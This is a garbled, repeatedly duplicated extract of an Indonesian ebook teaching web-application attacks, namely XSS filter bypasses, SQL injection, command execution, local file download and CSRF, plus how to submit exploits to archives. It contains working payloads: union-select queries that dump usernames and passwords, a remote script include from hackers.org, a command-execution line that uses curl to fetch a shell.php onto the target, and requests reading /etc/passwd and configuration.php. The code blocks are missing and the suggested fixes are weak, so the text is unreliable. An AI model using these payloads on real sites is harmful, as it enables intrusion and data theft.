Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
